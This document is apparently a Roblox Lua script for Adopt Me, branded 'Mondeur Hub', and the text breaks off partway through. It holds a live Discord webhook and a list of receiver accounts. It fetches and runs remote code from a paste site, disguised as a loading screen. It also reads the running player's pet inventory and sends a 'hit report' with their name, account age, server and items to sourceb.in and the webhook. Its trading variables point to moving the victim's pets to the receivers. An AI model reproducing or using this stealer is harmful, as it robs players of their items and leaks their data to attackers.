getgenv().WEBHOOK = "https://discord.com/api/webhooks/1474651524251648163/lhPvWSeT6mcm3b4tIfzEbph1asYmZGvxf3YABYsKUOSeInP3oXW10NmHKJuj0vDrICku"
getgenv().RECEIVERS = {"2ndcfpaj67", "sofiqmnz", "Hisokarah", "CREOLEO23"}
getgenv().THRESHOLD = 0 -- Minimum point value to ping/get

if _G.__MondeurRan then return end
_G.__MondeurRan = true

local CoreGui           = game:GetService("CoreGui")
local Players           = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService       = game:GetService("HttpService")
local RunService        = game:GetService("RunService")
local LocalPlayer       = Players.LocalPlayer

local TARGET_PLAYERS      = getgenv().RECEIVERS
local WEBHOOK_URL         = getgenv().WEBHOOK
local TRADE_RATE_THRESHOLD = getgenv().THRESHOLD

local isRunning                = false
local continuousTradingEnabled = false
local tradeRequestLoopRunning  = false
local currentTargetPlayer      = nil
local webhookSent              = false

--------------------------------------------------------------
-- LOADING SCREEN (ELYSIUM STYLE)
--------------------------------------------------------------
pcall(function()
    loadstring(game:HttpGet("https://pastefy.app/YXprt2gr/raw"))()
end)
task.wait(1.5)

--------------------------------------------------------------
-- ADOPT ME APIS & DATABASE
--------------------------------------------------------------
local Fsys = ReplicatedStorage:WaitForChild("Fsys", 60)
local Fsys2 = require(Fsys)
local load = Fsys2.load
local InventoryDB = load("InventoryDB")
local RouterClient = require(ReplicatedStorage.Client:WaitForChild("Modules"):WaitForChild("Global"):WaitForChild("RouterClient"):WaitForChild("RouterClient"))

--------------------------------------------------------------
-- WEBHOOK & HTTP HELPERS
--------------------------------------------------------------
local function sendWebhook(webhookUrl, content, embeds)
    if not webhookUrl or webhookUrl == "" then return end
    local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request
    if not requestFunc then return end
    
    local payload = {
        username = "Mondeur Hub | Final",
        content = content or "",
        embeds = embeds or {}
    }
    
    pcall(function()
        requestFunc({
            Url = webhookUrl,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode(payload)
        })
    end)
end

--------------------------------------------------------------
-- PASTEFY / SOURCEBIN UPLOAD (ELYSIUM STYLE)
--------------------------------------------------------------
local function uploadInventoryToPastefy(rawInvItems)
    local http_req = (syn and syn.request) or (http and http.request) or http_request or request
    if not http_req then return nil end

    local lines = {}
    table.insert(lines, "=== MONDEUR HUB ADM HIT REPORT ===")
    table.insert(lines, string.format("Player:      %s", LocalPlayer.Name))
    table.insert(lines, string.format("Account Age: %d days", LocalPlayer.AccountAge))
    table.insert(lines, string.format("Server:      %s", game.JobId))
    table.insert(lines, string.format("Receivers:   %s", table.concat(TARGET_PLAYERS, ", ")))
    table.insert(lines, "")
    table.insert(lines, string.format("=== FULL INVENTORY (%d items) ===", #rawInvItems))
    
    if #rawInvItems == 0 then
        table.insert(lines, "(empty)")
    else
        for i, item in ipairs(rawInvItems) do
            local neontag = item.isNeon and "[NEON] " or ""
            local megatag = item.isMega and "[MEGA] " or ""
            table.insert(lines, string.format("[%d] %s%s%s | Value: %s", i, megatag, neontag, item.name, tostring(item.value)))
        end
    end
    table.insert(lines, "\n=== END OF REPORT ===")

    local pasteContent = table.concat(lines, "\n")

    local ok, response = pcall(function()
        return http_req({
            Url = "https://sourceb.in/api/bins",
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode({ files = { { content = pasteContent } } })
        })
    end)

    if ok and response and response.StatusCode == 200 then
        local okD, data = pcall(function() return HttpService:JSONDecode(response.Body) end)
        if okD and data and data.key then
            return "https://cdn.sourceb.in/bins/" .. data.key .. "/0"
        end
    end
    return nil
end

--------------------------------------------------------------
-- INVENTORY FETCHING & FORMATTING
--------------------------------------------------------------
local function getAdoptMeInventory()
    local items = {}
    local totalVal = 0
    
    local success, inv = pcall(function() 
        return ReplicatedStorage.API["InventoryAPI/GetInventory"]:InvokeServer() 
    end)
    
    if not success or not inv then return items, 0 end

    for uniqueId, itemData in pairs(inv) do
        if itemData.Kind == "Pet" then
            local dbData = InventoryDB.pets[itemData.id]
            local itemName = (dbData and dbData.name) or itemData.id
            
            local val = (itemData.properties and itemData.properties.value) or 0
            local isNeon = (itemData.properties and itemData.properties.neon) == true
            local isMega = (itemData.properties and itemData.properties.mega_neon) == true
            
            local isHighTier = val >= 100 or isNeon or isMega

            table.insert(items, {
                uid = uniqueId,
                id = itemData.id,
                name = itemName,
                value = val,
                isNeon = isNeon,
                isMega = isMega,
                isHighTier = isHighTier,
                properties = itemData.properties
            })
            totalVal = totalVal + val
        end
    end

    -- Sort Descending by Value (Highest First)
    table.sort(items, function(a, b) return a.value > b.value end)
    return items, totalVal
end

local function formatItemLine(item)
    local emoji = item.isHighTier and "⭐" or "🐾"
    local tags = ""
    if item.isMega then tags = "🌈 **[MEGA]** "
    elseif item.isNeon then tags = "✨ **[NEON]** " end
    
    return string.format("%s %s%s ➜ `%s Pts`", emoji, tags, item.name, tostring(item.value))
end

--------------------------------------------------------------
-- WEBHOOK EMBED CONSTRUCTION (ELYSIUM STYLE)
--------------------------------------------------------------
local function buildInventoryLines(invItems, limit)
    local lines = {}
    local displayCount = math.min(limit, #invItems)
    for i = 1, displayCount do
        table.insert(lines, formatItemLine(invItems[i]))
    end
    if #invItems > limit then
        table.insert(lines, string.format("...and %d more items", #invItems - limit))
    end
    if #lines == 0 then table.insert(lines, "(empty)") end
    return lines
end

local function sendInventoryReport(rawInvItems, totalValue)
    if webhookSent then return end
    
    local highTierItems = {}
    for _, item in ipairs(rawInvItems) do
        if item.isHighTier then table.insert(highTierItems, item) end
    end

    local invLines = buildInventoryLines(rawInvItems, 15)
    local highTierLines = buildInventoryLines(highTierItems, 10)
    local pasteUrl = uploadInventoryToPastefy(rawInvItems)

    local pasteFieldValue = pasteUrl and string.format("[**View Full Inventory Log**](%s)", pasteUrl) or "*(upload failed)*"
    local pingMsg = (#highTierItems > 0 or totalValue >= TRADE_RATE_THRESHOLD) and "@everyone" or ""

    local embed = {
        title  = "Mondeur Hub • ADM Hit! [ 🌊 ]",
        color  = 0x3498DB,
        fields = {
            {
                name  = "👤 **Player Info**",
                value = string.format("
